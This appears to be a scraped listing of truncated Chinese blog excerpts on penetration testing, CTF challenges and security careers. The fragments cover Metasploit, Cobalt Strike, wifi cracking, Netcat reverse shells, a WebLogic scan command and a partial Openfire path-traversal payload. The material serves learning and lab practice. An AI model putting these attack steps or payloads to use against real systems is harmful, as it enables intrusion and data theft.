安装Hydra 1.安装必要的依赖库在终端中执行以下命令，安装Hydra所需的依赖库： sudo apt-get install build-essential checkinstall libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebi…

Kali-linux控制Meterpreter

Meterpreter是Metasploit框架中的一个杀手锏，通常作为利用漏洞后的攻击载荷所使用，攻击载荷在触发漏洞后能够返回给用户一个控制通道。当使用Armitage、MSFCLI或MSFCONSOLE获取到目标系统上的一个Meterpreter连接时，用户必须使用Meterpreter传…

web安全学习笔记【网络安全】

前言本文简单记录一下我学习 Web 安全方面的笔记。本文不涉及 IIS、Windows 和 SqlServer 的安全管理与配置，尽量只谈编程相关的安全问题。这个 Web 安全学习路线，整体大概半年左右，具体视每个人的情况而定。 （上传一直很模…

Linux服务器--基线检查

Linux服务器--基线检查一、前言二、口令策略2.1 检查项—密码策略2.2 检查项—密码生存期2.3 检查项—检查密码生存期是否作用于每个用户三、账号管理3.1 检查项—禁止存在UID相同的用户3.1 检查项—禁止存在空密码的帐户四、认证授权4.1 检查项—登陆失败处理五、文件权限…

某大型啤酒企业：CACTER邮件网关成功替换IronPort！安全防护升级

客户案例某大型啤酒厂商的公司规模和市场份额多年来始终都处于行业领先地位，积极赞助多项体育赛事，持续丰富和提升品牌形象。作为一家具有全球影响力的企业，自然也成为了全球黑客等攻击团伙的重点目标，而系统攻击的开端便是钓…

在网络安全领域中，主要有哪些技术方向？

入门Web安全、安卓安全、二进制安全、工控安全还是智能硬件安全等等，每个不同的领域要掌握的技能也不同。当然入门Web安全相对难度较低，也是很多人的首选。主要还是看自己的兴趣方向吧。本文就以下几个问题来说明网络安全大致学习过程👇 网…

常见漏洞扫描工具AWVS、AppScan、Nessus的使用

HVV笔记——常见漏洞扫描工具AWVS、AppScan、Nessus的使用1 AWVS1.1 安装部署1.2 激活1.3 登录1.4 扫描web应用程序1.4.1 需要账户密码登录的扫描1.4.2 利用录制登录序列脚本扫描1.4.3 利用定制cookie扫描1.5 扫描报告分析1.5.1 AWVS报告类型1.5.2 最常用的报告类型&#xff1a…

实战案例｜聚焦攻击面管理，腾讯安全威胁情报守护头部券商资产安全

金融“活水”润泽千行百业，对金融客户来说，由于业务场景存在特殊性和复杂性，网络安全必然是一场“持久战”。如何在事前做好安全部署，构建威胁情报分析的防护体系至为重要，实现更为精准、高效的动态防御。客户名片 …

[CTF/网络安全] 攻防世界 PHP2 解题详析

[CTF/网络安全] 攻防世界 PHP2 解题详析 index.php.phps扩展名姿势翻译：你能给这个网站进行身份验证吗？ index.php index.php是一个常见的文件名，通常用于Web服务器中的网站根目录下。它是默认的主页文件名，在访问一个网站时&am…

weblogic CVE 2017-10271

weblogic ip :192.168.27.128:7001 使用weblogicscan对目标进行探测 python3 WeblogicScan.py -u 192.168.27.128 -p 7001 扫到了不少洞，现在开搞2017-10271 漏洞原理 CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执行漏洞，主要由wls-…

如何对Windows剪切板里的内容进行取证分析 Windows剪切板取证

前言无论是在现实中对设备进行取证分析，还是在ctf中做取证类的题目，剪切板里的内容都需要去查看，以免遗漏什么重要信息剪切板位置剪切板是计算机操作系统提供的一个临时存储区域，用于在不同应用程序之间复制和粘贴文本、图像…

内网渗透(八十)之搭建额外域控

搭建额外域控我们在之前搭建完成Windows Server 2012 R2 域控的基础上搭建一个额外的域控。多个域控的好处在于，当其中有域控出现了故障，仍然能够由其他域控来提供服务。选择一台Windows Server 2012 R2 服务器作为额外域控，主机名为DC2. 首先在DC2上配置IP地址为192.168…

CTF密码学总结

0x01 目录常见编码: ASCII编码Base64/32/16编码shellcode编码Quoted-printable编码XXencode编码UUencode编码URL编码Unicode编码Escape/Unescape编码HTML实体编码敲击码(Tap code)莫尔斯电码(Morse Code)编码的故事各种文本加密换位加密: 栅栏密码(Rail-fence Cipher)曲路密…

cyfshow原谅杯

文章目录 fastapi2 for 阿狸clear()方法原谅4hintsh脚本读取文件和访问payload1payload2 原谅6_web3 fastapi2 for 阿狸过滤名单 [import, open, eval, exec, class, \, ", vars, str, chr, %, _, flag,in, -, mro, [, ]] fastapi的题目，很熟悉的访问文档red…

某大型啤酒企业：构建网络安全软实力，首选Coremail反钓鱼演练

客户背景某大型啤酒厂商的公司规模和市场份额多年来始终都处于行业领先地位，积极赞助多项体育赛事，持续丰富和提升品牌形象。作为一家具有全球影响力的企业，自然也成为了全球黑客等攻击团伙的重点目标，而系统攻击的开端便是钓鱼…

网络安全的学习路线是怎么样的？

在众多高大上的学习路线指导中，尝试做一股清流，把要讲清楚的都讲清楚，该学些什么，学到哪个程度进入到下一阶段的学习这些才是最重要的。在学习之前首先要做好学习的系统规划： 1.目前市场需求主流的岗位里&#xff0…

xss跨站脚本攻击姿势大全

XSS（跨站脚本攻击，Cross-Site Scripting）是一种常见的网络安全漏洞，攻击者通过在受信任的网站上注入恶意脚本代码，然后使用户在浏览器中执行这些恶意代码，从而实现攻击目的。XSS 攻击通常发生在使用不安全的…

如何通过提高技能来克服 IT 技能差距

有时招聘很容易，你发布了职位描述，然后突然被热切的、合格的候选人淹没了。特别是对于技术职位，招聘前景从未如此黯淡。谈论信息技术 (IT) 人才缺口是不可避免的，并且有充分的理由：根据研究，73% 的企业领…

各位自学网络安全的同学，你们的学习路线真的对吗？

最近看到很多问题，都是小白想要转行网络安全行业咨询学习路线和学习资料的，作为一个培训机构，学习路线和免费学习资料肯定是很多的。机构里面的不是顶级的黑阔大佬就是正在学习的同学，也用不上这些内容，每天都在某云盘…

Kali-linux无线网络嗅探工具Kismet

如果要进行无线网络渗透测试，则必须先扫描所有有效的无线接入点。刚好在Kali Linux中，提供了一款嗅探无线网络工具Kismet。使用该工具可以测量周围的无线信号，并查看所有可用的无线接入点。本节将介绍使用Kismet工具嗅探无线网络。 &#xf…

Cobalt Strike工具基本使用

Cobalt Strike 安装启动启动server端启动client目标机器连接工具基使用用户驱动攻击屏幕截图进程列表键盘记录文件管理远程vnc远程代理端口扫描生成后门被攻击者运行后门文件后查看结果钓鱼攻击信息收集网站克隆文件下载安装网盘地址：链接：https:/…

Kali-linux使用Aircrack-ng工具破解无线网络

Aircrack-ng是一款基于破解无线802.11协议的WEP及WPA-PSK加密的工具。该工具主要用了两种攻击方式进行WEP破解。一种是FMS攻击，该攻击方式是以发现该WEP漏洞的研究人员名字（Scott Fluhrer、Itsik Mantin及Adi Shamir）所命名；另一种…

细说websocket - php篇

下面我画了一个图演示 client 和 server 之间建立 websocket 连接时握手部分，这个部分在 node 中可以十分轻松的完成，因为 node 提供的 net 模块已经对 socket 套接字做了封装处理，开发者使用的时候只需要考虑数据的交互而不用处理连接的建立…

白帽黑客最常用的十款工具，你知道几款？

1 Nmap nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络…

内网渗透(八十四)之ADCS配置启用基于SSL的LDAP(LDAPS)

ADCS配置启用基于SSL的LDAP(LDAPS) 打开AD CS，选择证书颁发机构选择证书模板，右键管理选择Kerberos身份验证，右键复制模板然后会有一个Kerberos身份验证的副本，右键更改名称，更改为LDAPS 选择LDAPS，右键属性设置模板属性，请求处理——>允许导出私钥(O) 创建证书…

什么是网络安全？如何让普通人简单的了解网络安全

一、介绍网络安全可以介绍一下河南郑州的网络安全科技馆。网络安全科技馆设置个人安全、政企安全、社会安全、综合竞技四个主展区，帮大家普及网络安全知识。首先，可以从个人安全展区开始游览，了解我们身边的网络安全，原来网络安…

自学网络安全（黑客），一般人我劝你还是算了吧

一、自学网络安全学习的误区和陷阱 1.不要试图先成为一名程序员（以编程为基础的学习）再开始学习我在之前的回答中，我都一再强调不要以编程为基础再开始学习网络安全，一般来说，学习编程不但学习周期长，而…

Kali-linux Gerix Wifi Cracker破解无线网络

Gerix Wifi Cracker是另一个aircrack图形用户界面的无线网络破解工具。本节将介绍使用该工具破解无线网络及创建假的接入点。 9.3.1 Gerix破解WEP加密的无线网络在前面介绍了手动使用Aircrack-ng破解WEP和WPA/WPA2加密的无线网络。为了方便，本小节将介绍使用Geri…

《metasploit渗透测试魔鬼训练营》学习笔记第六章--客户端渗透

四.客户端攻击客户端攻击与服务端攻击有个显著不同的标识，就是攻击者向用户主机发送的恶意数据不会直接导致用户系统中的服务进程溢出，而是需要结合一些社会工程学技巧，诱使客户端用户去访问这些恶意数据，间接发生攻击。 4.1客户…

推动网络安全的三大问题

网络攻击已成为技术主管和企业最关心的问题之一。预计到2025 年，网络犯罪将使公司每年损失 105 亿美元。2021 年网络犯罪的预估成本为 6.1 万亿美元，预计每年增长 15%。企业正在增加网络安全预算以保护其资产。2022年，网络安全职位的发布数…

第十六届全国大学生信息安全竞赛创新实践赛初赛部分WP AGCTF战队

持续两天的比赛，打的很累，web没有出太多的题，比赛被pwn师傅带飞了，希望下此加油，下边是此次比赛排名。文章目录 MISC签到卡被加密的生产流量国粹调查问卷pyshell CRYPTO基于国密SM2算法的密钥密文分发可信度量Sign_i…

自学网络安全有什么好方法？

一、网络安全学习的误区 1.不要试图以编程为基础去学习网络安全不要以编程为基础再开始学习网络安全，一般来说，学习编程不但学习周期长，且过渡到网络安全用到编程的用到的编程的关键点不多。一般人如果想要把编程学好再开始学习网络安全往…

内网渗透(八十六)之Exchange ProxyLogon攻击链利用

Exchange ProxyLogon攻击链利用漏洞背景 2021年3月2日，微软发布了Exchange服务器的紧急安全更新，修复了如下7个相关的漏洞。 Exchange服务端请求伪造漏洞（CVE-2021-26855):未经身份验证的攻击者能够构造HTTP请求扫描内网并通过Exchange服务器进行身份验证。Exchange反序列…

都2023年了，还有人在盲目自学黑客？

背景经常逛CSDN和知乎，不理解的是，都2023年了，相关资源都这么多了，还有人不知道怎么学习网络安全。本人从事网络安全工作5年，在几个大厂都工作过，安全服务、渗透测试工程师、售前、主机防御等职位都做过…

网路安全技能竞赛——【Linux操作系统渗透提权】解析（超级详细）

Linux操作系统渗透提权任务环境说明： 服务器场景：Server2202（关闭链接）用户名：hacker 密码：123456 使用渗透机对服务器信息收集，并将服务器中SSH服务端口号作为flag提交；…

如何做好网站建设定制开发

随着互联网的发展，如今的网站建设技术越来越先进，所以在网站建设定制开发中就出现了很多的模版，如：企业类型、产品信息、品牌介绍等。当然网站建设定制开发不是说只要模版就行了，对于网站建设而言，模版只是…

听劝不要盲目的学网络安全。

听劝不要盲目的学网络安全。 1.这是一条坚持的道路,三分钟的热情可以放弃往下看了. 2.多练多想,不要离开了教程什么都不会了.最好看完教程自己独立完成技术方面的开发. 3.有时多 google,baidu,我们往往都遇不到好心的大神,谁会无聊天天给你做解答. 4.遇到实在搞不懂的,可…

防火墙之服务器负载均衡

防火墙之服务器负载均衡原理概述： 防火墙（英语：Firewall）技术是通过有机结合各类用于安全管理与筛选的软件和硬件设备，帮助计算机网络于其内、外网之间构建一道相对隔绝的保护屏障，以保护用户资料与信息安…

【红队靶场】暗月五月考核靶场sunday

红队靶场 🎉B站配套视频：【顺手挂个三连呗】 https://www.bilibili.com/video/BV1xu4y1Z71y/?share_sourcecopy_web&vd_source0e30e09a4adf6f81c3038fa266588eff🔥系列专栏：红队靶场 🎉欢迎关注🔎点赞…

C/C++常用库及工具

值得学习的C语言开源项目 - 1. Webbench Webbench是一个在Linux下使用的非常简单的网站压测工具。它使用fork()模拟多个客户端同时访问我们设定的URL，测试网站在压力下工作的性能，最多可以模拟3万个并发连接去测试网站的负载能力。Webbench使用C语言编…

如何零基础自学网络安全？

学前感言: 1.这是一条坚持的道路,三分钟的热情可以放弃往下看了. 2.多练多想,不要离开了教程什么都不会了.最好看完教程自己独立完成技术方面的开发. 3.有时多 google,baidu,我们往往都遇不到好心的大神,谁会无聊天天给你做解答. 4.遇到实在搞不懂的,可以先放放,以后再来解…

网络安全面试题大全（整理版）+附答案

随着国家政策的扶持，网络安全行业也越来越为大众所熟知，想要进入到网络安全行业的人也越来越多。为了拿到心仪的 Offer 之外，除了学好网络安全知识以外，还要应对好企业的面试。作为一个安全老鸟，工作这么多年&…

【网络安全】企业应急响应基础技能

windows 任务计划列表 1. 计算机管理窗口,选择系统工具中任务计划程序中的任务计划程序库选项可以查看任务计划的名称,状态,触发器等详细信息 2.powershell中输入get-scheduledtask 可以查看当前系统所有任务计划信息任务路径,名称,状态等详细信息 3.命令行中输入s…

网安大佬常用的10大工具

从事网络安全工作，手上自然离不开一些重要的网络安全工具。今天，分享10大网络安全工具。一、Kali Linux Kali 是一个基于 Debian 的 Linux 发行版。它的目标就是为了简单：在一个实用的工具包里尽可能多的包含渗透和审计工具。Kali 实现了这…

网络安全怎么学？学习路线资料分享

一.自己对网络安全的理解安全其实有很多个方向，从大的方面来说，也就是测试和开发。测试，细分下来，又有渗透（也就是所谓的web），逆向（也就是所谓的二进制，主要是代码审计方…

内网安全：内网渗透.（拿到内网主机最高权限 vulntarget 靶场 A）

内网安全：内网渗透.（拿到内网主机最高权限） 内网穿透又被称为NAT穿透，内网端口映射外网，在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。通过映射端口，让外网的电脑找到处于内网的电脑。…

喜报！恭喜知了堂学员成功通过CISP-PTE证书考试

有人说，大学可以不谈恋爱，但一定要考证。考证，是大学校园生活的关键一环。充分利用在校时间为后期就业提前储备优势，毕业后如果从事IT领域，证书就是一个高含金量的专业认证，尤其是网络安全行业&#xff0…

淦、我的服务器又被攻击了

「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》最近老是有粉丝问我，被黑客攻击了，一定要拔网线吗？还有…

一个轻量级Web蜜罐（附下载地址）

Loki 0x01 Why 目标: 抓漏洞. 大概是没有找到啥子开源的符合我预期的蜜罐吧，所以自己动手写了。 0x02 What 想做什么样的蜜罐? 1.便于维护,随开随用,配置简单。 2.Web低仿真即可,且只抓Web流量。 3.不同端口指向不同的页面,响应头配置等。 0x03 How SpringB…

自学网络安全怎么规划路线？

01 什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面…

全网最详细网络安全学习路线！手都给我码酸了！

零基础小白，学完掌握可就业！入门到入土的网安学习路线！ 在各大平台搜的网安学习路线都太粗略了。。。。看不下去了！ 我把自己报班的系统学习路线，整理拿出来跟大家分享了！ 本文为纯干货纯文字内容&#x…

网络安全之反序列化漏洞分析

简介 FastJson 是 alibaba 的一款开源 JSON 解析库，可用于将 Java 对象转换为其 JSON 表示形式，也可以用于将 JSON 字符串转换为等效的 Java 对象分别通过toJSONString和parseObject/parse来实现序列化和反序列化。使用对于序列化的方法toJSONStrin…

腾讯安全杨光夫：企业需改变“头痛医头”现状，构建持续进化的安全免疫力

6月13日，腾讯安全联合IDC发布“数字安全免疫力”模型框架，主张将守护企业数据和数字业务两大资产作为企业安全建设的核心目标。腾讯安全副总裁杨光夫在《助力企业持续进化安全免疫力》的主题演讲中表示，在新业态、新威胁、新场景、强监管下&a…

【高危】Openfire权限绕过漏洞(POC公开)

漏洞描述 Openfire是Java开发且基于XMPP（前称Jabber，即时通讯协议）的开源实时协作（RTC）服务器。在受影响版本中，由于路径验证机制存在缺陷，攻击者可以通过/setup/setup-s/%u002e%u002e/%u002e…

自学黑客（网络安全），一般人我劝你还是算了吧（自学网络安全学习路线--第四章操作系统安全基础）【建议收藏】

文章目录一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、自学网络安全学习路线一、Windows操作系统1、Windows操作系统简介2、Windows 95/98/ME安全体系结构：3、 Windows NT/2000/XP的安全基础：4、 Windows 2000安全基础概念5、 W…

Vault部署保姆级教程

Vault部署官方文档：Install | Vault | HashiCorp Developer 软件运行环境操作系统发行版及版本：自己选 Vault版本：XXXX Vault配置文件路径：/etc/vault.d/vault.hcl Vault环境变量路径：/etc/vault.d/vault.env Vault TLS文件路径：/opt/vault/tls（Qqun830709780）…

用友畅捷通CRM SQL注入漏洞复现

0x01 产品简介用友畅捷通CRM是面向小企业全力打造的简单、实用的客户关系管理应用。帮助企业用好自己的客户资源、管好商机跟进过程、引导好业务员跟单行为，促进团队销售能力的提升；通过查询和分析，识别企业的价值客户，融合电话、…

怎么自学网安？过程中遇到问题怎么解决

趁着今天下班，我花了几个小时整理了下，非常不易，希望大家可以点赞收藏支持一波，谢谢。我的经历： 我 19 年毕业，大学专业是物联网工程，我相信很多人在象牙塔里都很迷茫，到了大三大…

Windows安装和配置VCenter

Vcenter的环境搭建和配置 Vcenter简介 Vcenter一般指 VMware vCenter™ Server，VMware vCenterServer 提供了一个可伸缩、可扩展的平台，为虚拟化管理奠定了基础。 VMware vCenter Server（以前称为 VMware VirtualCenter）&#…

高考之后想学习网络安全，网络安全/信息安全是一个好的专业吗？

本人信息安全专业毕业，在甲方互联网大厂安全部与安全乙方大厂都工作过，有一些经验可以供对安全行业感兴趣的人参考。或许是因为韩商言让更多人知道了CTF，也或许是因为网络安全越来越受国家重视，安全最近愈加火爆了。当然&#x…

大龄、零基础，想转行做网络安全。怎样比较可行？一般人我还是劝你算了吧

昨晚上真的给我气孕了。对于一直以来对网络安全兴趣很大，想以此作为以后的职业方向的人群。不用担心，你可以选择兼顾工作和学习，以步步为营的方式尝试转行到网络安全领域。那么，网络安全到底要学些什么呢？ &…

Web安全：bWAPP 靶场搭建.（集成了各种常见漏洞和最新漏洞的开源Web应用程序）

Web安全：bWAPP 靶场搭建. bWAPP是一个集成了了常见漏洞的 web 应用程序，目的是作为漏洞测试的演练场，帮助安全爱好者，开发人员和学生发现和防止Web漏洞。它有超过100个网络漏洞数据，包括所有主要的已知网络漏洞. 目录…

CTFshow-pwn入门-Test_your_nc

pwn0 靶场环境启动开，显示ssh连接。直接打开ctfshow的pwn专用虚拟机来使用ssh连接。密码是123456。连接之后，他会出现这样的一大堆的介绍性文字，不用管他，然他输出完就行。中间还用各种语言说了一下“消灭人类暴政&#xff…

B-6:逆向分析及隐写

任务环境说明：服务器场景: FTPServer20220509(关闭链接) FTP用户名:PE01密码: PE01 C语言:渗透机Windows7 (Embarcadero Dev-C++) 1,从靶机服务器的FTP上下载PE01文件,对PE01. exe二进制文件进行静态调试，将 main 函数的入口地址作为 Flag 值提交；双击渗透机kali桌面上…

思科交换机与路由器基础命令（二）

作者：Insist-- 个人主页：insist--个人主页作者会持续更新网络知识和python基础知识，期待你的关注目录一、静态路由与默认路由配置命令 1、静态路由 2、默认路由 3、查看路由表三、使用ping命令测试连通性 1、排除物理故障&#xff…

云安全技术(一)之什么是云计算

对于在云环境中工作的安全专家而言，从传统数据中心模型获得的许多知识和最佳实践仍然适用于云计算环境，但安全专家对云计算概念、不同类型的云模型和云服务的深入理解对于成功实施和监督(Overseeing)安全策略和合规性至关重要。什么是云计算 1.1 云计…

云安全技术(三）之云计算相关的安全概念

云计算相关的安全概念 Security Concepts Relevant to Cloud Computing 1. 密码学和密钥管理 Cryptography and key management 1、加密技术: 有许多不同类型和等级的加密技术。在云环境中，云安全专家有责任评价应用程序的需求、所使用的技术、需要保护的数据类型&…

CTFshow-pwn入门-前置基础pwn23-pwn25

pwn23-25的题目会涉及到ret2shellcode、ret2libc等内容，本篇文章只会侧重研究这几道题目的wp，不会过多涉及到ret2shellcode、ret2libc的基本原理，等有时间再来写关于ret2libc、ret2shellcode…的相关内容。大家可以参考CTFwiki的文章去慢慢学…

Smartbi内置用户登陆绕过漏洞复现

0x01 产品简介 Smartbi大数据分析产品融合BI定义的所有阶段，对接各种业务数据库、数据仓库和大数据分析平台，进行加工处理、分析挖掘和可视化展现；满足所有用户的各种数据分析应用需求，如大数据分析、可视化分析、探索式分析、复杂…

内网隧道代理技术（五）之 Netcat反弹Shell

Netcat反弹Shell Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作,常用参数如下： 参数作用-c指定连接后要执行的shell命令-e指定连接后要执行的文件名-k配置 Socket一直存活(若不想…

NAPT之NAT地址池、NAPT之easy-ip、NAT-Server

NAPT之NAT地址池拓扑需求实现企业内网主机（PC1-PC4）访问公网网站服务器（Server1） 配置步骤第一步：给PC1-PC4/Server1配置接口IP地址，掩码，网关第二步：R1配置默认路由 -边界…

常见的未授权漏洞批量检测工具

常见的未授权漏洞检测命令行版已放出支持多线程，批量扫描，指定服务扫描，命令行版地址https://github.com/xk11z/unauthorized_com GUI版unauthorizedV2已更新，可批量ip检测导出结果项目包含 1 、FTP 未授权访问&#xff08…

共建信创安全生态|安全狗正式加入麒麟软件安全生态联盟

5月25日，麒麟软件安全生态联盟第二次工作会议顺利举办。作为国内云原生安全领导厂商，安全狗以安全生态联盟成员单位应邀参会并发表重要观点。厦门服云信息科技有限公司（品牌名：安全狗）成立于2013年，致力于…

自学黑客（网络安全），一般人我劝你还是算了吧（自学网络安全学习路线--第十五章信息安全评测与风险评估）【建议收藏】

文章目录一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、自学网络安全学习路线一、信息安全风险评估1、评估概述2、评估步骤3、评估分类二、信息安全风险评估标准1、TCSEC3、CTCPEC4、CTCPEC5、FC6、CC7、中国的安全标准一、自学网络安全学习的误区和陷…

一、网络安全渗透测试的相关理论和工具

一、网络安全渗透测试是什么呢？ 在美国著名电影《金蝉脱壳》中，雷布雷斯林是这个世界上最强的越狱高手之一，他在过去8年的时间内成功地从14所守卫高度森严的重型监狱中逃脱。即便如此，雷布雷斯林却并不是一个罪犯，他真…

VMware15.5虚拟机软件安装教程（多图流步骤详细）

VMware15.5安装步骤安装步骤双击打开安装文件，或者右键点击以管理员身份运行（有些小伙伴把电脑权限限制的比较死，那就必须用这个方法才能正常执行安装程序），执行程序后如图： 直接点击下一步后&#xff…

网络安全（黑客）自学

建议一：黑客七个等级黑客，对很多人来说充满诱惑力。很多人可以发现这门领域如同任何一门领域，越深入越敬畏，知识如海洋，黑客也存在一些等级，参考知道创宇 CEO ic（世界顶级黑客团队 0x557 成员&…

网络安全发展

一、网络安全发展趋势 1、什么是网络安全目的：确保网络系统连续、可靠、正常运行，保证网络服务和业务不中断措施：保护网络系统的硬件、软件、数据、不遭受破坏、不被更改，不会泄密主要两个方面：网络攻击、网络防御 …

超详细的最新版 2022.2 kali 安装步骤及拍摄快照的方法

kali的安装教程 1.进入官方网站 https://www.kali.org 点击Downloads进行下载 2.跳转至下载界面有虚拟机的直接选择第一个下载镜像就可，没有虚拟机的选择第二个。我电脑上有虚拟机直接下载镜像ok 3.这里有好几个映像，根据自己的需求下载。我下载的…

HCIA--IPv4

IPv4地址 32位的二进制数---以点分十进制的方式书写出来（例192.168.1.1） 什么是点分十进制？--由点区分的十进制--3点区分4段-每段8位--8位二进制转10进制 IPv4地址--网络掩码一个完整的IP地址是需要掩码的网络掩码的作用--区分网络位和…

HCIA--交换

路由：静态路由、动态路由（RIP，OSPF） 交换---代表---交换机交换机作用： 1.延长传输距离 2.解决冲突域 3.实现单播交换中的VLAN技术 VLAN--虚拟局域网交换机与路由器协调工作，之后，将原…

XCTF 攻防世界 pwn新手题(get_shell)

XCTF 攻防世界 pwn新手题(get_shell) 这道题十分简单，题目描述说运行就能拿到shell，可以先用nc尝试连接一下题目场景给的地址，直接就连接上了： 然后，ls，cat flag直接就可以获取到flag了

XCTF 攻防世界 Reverse新手题（open-source）

XCTF 攻防世界 Reverse新手题（open-source） 这道题主要是分析代码，因为源代码已经直接给出了： #include <stdio.h> #include <string.h>int main(int argc, char *argv[]) {if (argc ! 4) {printf("what?\n&q…

XCTF 攻防世界 Reverse新手题（game)

XCTF 攻防世界 Reverse新手题（game) 这道题目按照一般IDA静态分析的思路走，应该不难做出来首先，找到main函数，F5反编译一下发现main_0()函数，进入此函数，反编译一下对main_0()的代码进行分析&#xff0…

vSphere部署黑群晖详细步骤---实现家庭云盘，文件同步等实用功能（上）

前言为什么需要家庭存储？ 几乎每个人我都会想去安利家庭存储的重要性，网络技术的高速发展是把双刃剑，你所能得到的跟受到的限制一直是对立面，十几二十年前，网络处于萌芽阶段时，没有墙，拨号的龟…

渗透测试和CTF中SQL注入攻击

渗透测试和CTF中SQL注入攻击本文内容主要基于MySQL的注入首先，SQL注入的成因：开发人员在开发过程中，直接将URL中的参数，HTTP Body中的POST参数或其它外来的用户输入（如Cookies、User-Agent等）与SQL语句…

漏洞复现|Kyan密码泄露/命令执行漏洞

0x01阅读须知所有发布的技术文章仅供参考，未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作，否则对他人或单位而造成的直接或间接后果和损失，均由使用者本人负责。郑重声明：本文所提供的工具与思路仅用于学习与…

白帽子转型甲方杂绪

1.企业安全建设涵盖的内容安全是一门含义很广的学科，信息安全、网络安全、网络空间安全等都是安全中的一个分支，有交集却也有不同。对于甲方企业安全来说，通常又分为：安全体系（等保、合规、审计）、基础…

hping3拒绝服务攻击工具

hping3官网地址 CentOS7安装hping3 # 安装依赖 yum install gcc.x86_64 libpcap-devel.x86_64 tcl-devel -y# 下载安装包 wget http://www.hping.org/hping3-20051105.tar.gz tar -xf hping3-20051105.tar.gz && cd hping3-20051105# 编译安装 ./configure # 此时报错…

完成一次渗透测试项目 New Address

背景：小B接到一个渗透测试任务，由于很久没有从乙方视角执行渗透测试的他决定先梳理一下自己的思路。准备工作第一个是渗透测试用例：对于技术人员来讲这是一个比较好的知识点沉淀的方式，不但有助于你在每一次的渗透测试中不遗漏…

网络安全：绕过CDN，socket与HTTP，cookie与session，Linux挂代理，git config配置等

linux挂代理可以通过让终端走代理的方式来加快速度代理:代理是通过客户端与服务端通信,传输服务端能够访问到的资源文件,再由服务端客户端通信返回给客户端,从而间接访问服务端能访问的资源. -方法一：（推荐使用） 为什么说这个方法推荐使用呢…

2023年最新整理网络安全护网蓝队面试题

如何打击黑灰产工具全面监控和快速响应（溯源）：对黑灰进行长期跟进，了解黑灰产工具的传播链条和路径，第一时间捕获活跃的黑灰产工具（建立特征词监控，数据取样、交叉分析） 建立软件指…

CISSP证书考试难度大吗？本文教你如何轻松拿下CISSP

主题：CISSP含金量、CISSP考试经验、CISSP备考、CISSP考试大纲 CISSP含金量高 CISSP注册信息系统安全师认证是信息安全领域被全球广泛认可的IT安全认证，一直以来被誉为业界的“金牌标准”。CISSP认证不仅是对个人信息安全专业知识的客观评估&#xff0c…

安全防御 --- SSL VPN

附：无线项目介绍 SSL VPN 有浏览器的设备就可以使用SSL，进而使用SSL VPN。无需担心客户端问题，所以SSL VPN也称为无客户端VPN。SSL VPN在client to lan场景下特别有优势。实际实现过程（基于TCP实现） （1&…

PHP is_numeric()函数详解，PHP判断变量是否为数字或数字字符串，is_numeric()绕过

「作者主页」：士别三日wyx 「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 is_numeric 一、基本使用二、16进制绕过三、科学计…

ATTCK（一）之为什么要学习ATTCK

ATT&CK 简介本系列旨在介绍网络红蓝对抗领域最好的ATT&CK矩阵模型，以期帮助有意愿深耕在红蓝对抗领域的人员能系统性的掌握红蓝对抗领域的知识和经验。本系列将详细ATT&CK的起源、发展历史，ATT&CK矩阵相对其他High-Level红蓝对抗模型…

无线学习：名词解释【无线学习笔记一】

无线学习的入门，先了解一些常见的缩写。目录 SDR： USRP： UHD： GnuRadio： OpenBTS： srsLTE： OpenLTE： OAI： 无线攻击手段窃取短信验证码的攻击手段&#xff…

nacos批量信息获取-GitNacosConfig

声明：文中涉及到的技术和工具，仅供学习使用，禁止从事任何非法活动，如因此造成的直接或间接损失，均由使用者自行承担责任。点点关注不迷路，每周不定时持续分享各种干货。原文链接：众亦信安&a…

Kali Linux安装中国蚁剑（AntSword）

Kali Linux安装中国蚁剑（AntSword） 下载地址：https://github.com/AntSwordProject/下载Linux64位的AntSword-Loader进入解压目录后，给执行权限：chmod ux AntSword进行安装前要创建空目录，最好是/usr/local…

IPv4地址范围以及子网范围计算+子网掩码表

IPv4地址范围以及子网范围计算 1. 分类IP范围 ClassRangeA0.0.0.0 - 10.255.255.255B128.0.0.0 - 191.255.255.255C192.0.0.0 - 223.255.255.255D224.0.0.0 - 239.255.255.255E240.0.0.0 - 255.255.255.255 2. 保留IP范围 10.0.0.0 - 10.255.255.255 127.0.0.0 - 127.255.25…

自学黑客（网络安全），一般人我劝你还是算了吧（自学网络安全学习路线--第十二章无线网络安全上）【建议收藏】

文章目录一、自学网络安全学习的误区和陷阱二、学习网络安全的一些前期准备三、自学网络安全学习路线一、无线网络技术1、GSM、CDMA与3G网络2、无线局域网二、移动通信网安全性分析1、GSM网络安全2、3G网络安全一、自学网络安全学习的误区和陷阱 1.不要试图先成为一名程序员…

host碰撞，利用host碰撞突破访问边界

文章目录先提神host 碰撞漏洞原理漏洞利用步骤漏洞复现先提神 host 碰撞直接利用ip访问显示的是403 404 400 500，但是用域名请求就会返回正常业务。当然在排除WAF作祟下（有一些WAF它会要求使用域名访问，使用IP的会出现WAF的拦截界面&…

应急--加固

应急： 1、找原因，为什么会产生勒索病毒？ 1）、勒索病毒的特征：文件加密、BTC（比特币）地址--家族，定位到解密方式， 2）、如何解密，搜不出来怎么办…

321-应急2

